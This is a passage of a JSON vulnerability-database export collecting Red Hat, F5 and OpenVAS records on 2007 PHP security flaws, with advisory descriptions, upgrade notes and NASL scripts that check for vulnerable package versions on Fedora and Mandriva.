{"redhat": [{"lastseen": "2018-12-11T17:44:40", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285) \r\n\r\nA flaw was found in the way PHP's unserialize() function processed data. If\r\na remote attacker was able to pass arbitrary data to PHP's unserialize()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1286)\r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker was able to pass arbitrary data to PHP's session_decode()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1711)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. 
(CVE-2007-0455)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T12:19:55", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0155", "href": "https://access.redhat.com/errata/RHSA-2007:0155", "type": "redhat", "title": "(RHSA-2007:0155) Important: php security update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-12-11T17:44:13", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary strings using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. 
(CVE-2007-0455)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2018-05-03T23:41:46", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0162", "href": "https://access.redhat.com/errata/RHSA-2007:0162", "type": "redhat", "title": "(RHSA-2007:0162) Moderate: php security update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-12-11T17:45:19", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. 
(CVE-2007-1718)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T12:17:01", "published": "2007-04-20T04:00:00", "id": "RHSA-2007:0153", "href": "https://access.redhat.com/errata/RHSA-2007:0153", "type": "redhat", "title": "(RHSA-2007:0153) Moderate: php security update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-12-11T17:43:32", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way PHP's unserialize() function processes data. If\r\na remote attacker is able to pass arbitrary data to PHP's unserialize()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1286)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker is able to pass arbitrary data to PHP's session_decode()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. 
(CVE-2007-1711)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2018-03-14T19:27:09", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0154", "href": "https://access.redhat.com/errata/RHSA-2007:0154", "type": "redhat", "title": "(RHSA-2007:0154) Important: php security update", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2017-06-08T00:16:05", "bulletinFamily": "software", "description": "", "modified": "2016-07-25T19:54:00", "published": "2007-09-17T04:00:00", "href": "https://support.f5.com/csp/article/K7859", "id": "F5:K7859", "title": "Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2016-11-09T00:09:33", "bulletinFamily": "software", "description": "PHP has been cited with multiple vulnerabilities. For information about these vulnerabilities, refer to the National Vulnerabilities Database.\n\nInformation about these advisories is available at the following locations:\n\n * (CVE-2007-1846) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1846> \nSQL injection vulnerability in index.php in the MyAds 2.04jp and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands using the cid parameter.\n\n * (CVE-2007-2509) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2509> \nCRLF injection vulnerability in the ftp_putcmd function in PHP before 4.4.7, and 5.x before 5.2.2 allows remote attackers to inject arbitrary FTP commands using CRLF sequences in the parameters to earlier FTP commands.\n\n * (CVE-2007-1285) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1285> \nA denial of service flaw was found in the way PHP processed a deeply nested array. 
A remote attacker could cause the PHP interpreter to crash by submitting an input variable with a deeply nested array.\n\n * (CVE-2007-1286) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1286> \nA flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass arbitrary data to PHP's unserialize() function, they could possibly execute arbitrary code as the apache user.\n\n * (CVE-2007-1583) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1583> \nA flaw was found in the way the mbstring extension set global variables. A script that used the mb_parse_str() function to set global variables could be forced to enable the register_globals configuration option, possibly resulting in global variable injection.\n\n * (CVE-2007-1711) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1711> \nA double free flaw was found in PHP's session_decode() function. If a remote attacker was able to pass arbitrary data to PHP's session_decode() function, they could possibly execute arbitrary code as the apache user.\n\n * (CVE-2007-1718) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1718> \nA flaw was discovered in the way PHP's mail() function processed header data. If a script sent mail using a subject header containing a string from an untrusted source, a remote attacker could send bulk email to unintended recipients.\n\n * (CVE-2007-1001) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1001> \nA heap based buffer overflow flaw was discovered in PHP's gd extension. A script that could be forced to process WBMP images from an untrusted source could result in arbitrary code execution.\n\n * (CVE-2007-0455) \n<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0455> \nA buffer over-read flaw was discovered in PHP's gd extension. 
A script that could be forced to write arbitrary string using a JIS font from an untrusted source could cause the PHP interpreter to crash.\n\nF5 Product Development tracked this issue as CR79338 and CR77989 and it was fixed in BIG-IP 9.3.1 and 9.4.1. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>), [GTM](<https://support.f5.com/content/kb/en-us/products/big-ip_gtm.html>), [ASM](<https://support.f5.com/content/kb/en-us/products/big-ip_asm.html>), [Link Controller](<https://support.f5.com/content/kb/en-us/products/lc_9_x.html>), or [WebAccelerator](<https://support.f5.com/content/kb/en-us/products/wa.html>) release notes.\n\nAdditionally, this issue was fixed in Hotfix-BIG-IP-9.3.0-HF3 issued for BIG-IP 9.3.0. You may download this hotfix or later versions of the cumulative hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nF5 Product Development tracked this issue as CR86810 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/content/kb/en-us/products/firepass.html>) release notes.\n\nAdditionally, this issue was fixed in hotfix HF-602-2 issued for FirePass 6.0.2, hotfix HF-601-9 issued for FirePass 6.0.1, and hotfix HF-552-11 issued for FirePass 5.5.2. You may download these hotfixes or later versions of the cumulative hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\n**Note:** FirePass will silently close invalid connections. This behavior may cause some security scan devices to interpret the silent closure as the FirePass being vulnerable and to report a false positive.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy. 
\n \nFor information about managing F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n", "modified": "2016-07-25T00:00:00", "published": "2007-09-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/7000/800/sol7859.html", "id": "SOL7859", "title": "SOL7859 - Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-25T10:56:17", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861368", "id": "OPENVAS:861368", "title": "Fedora Update for php FEDORA-2007-415", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-415\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. 
PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora Core 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00044.html\");\n script_id(861368);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"FEDORA\", value: \"2007-415\");\n script_cve_id(\"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1001\", \"CVE-2007-0455\");\n script_name( \"Fedora Update for php FEDORA-2007-415\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-common\", rpm:\"x86_64/php-common~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-cli\", rpm:\"x86_64/php-cli~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", 
rpm:\"x86_64/php-xmlrpc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~3.5.fc6\", rls:\"FC6\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-common\", rpm:\"i386/php-common~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-cli\", rpm:\"i386/php-cli~5.1.6~3.5.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-04-09T11:38:59", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830059", "id": "OPENVAS:1361412562310830059", "title": "Mandriva Update for php MDKSA-2007:089 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:089 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP interpreter to crash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n A buffer overflow in the sqlite_decode_function() in the bundled\n sqlite library could allow context-dependent attackers to execute\n arbitrary code (CVE-2007-1887).\n \n Updated packages have been patched to correct these issues. 
Also note\n that the default use of the Hardened PHP patch helped to protect\n against some of these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00025.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830059\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:089\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1887\");\n script_name( \"Mandriva Update for php MDKSA-2007:089 (php)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.7mdv2007.0\", 
rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.2mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-24T12:56:11", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830059", "id": "OPENVAS:830059", "title": "Mandriva Update for php 
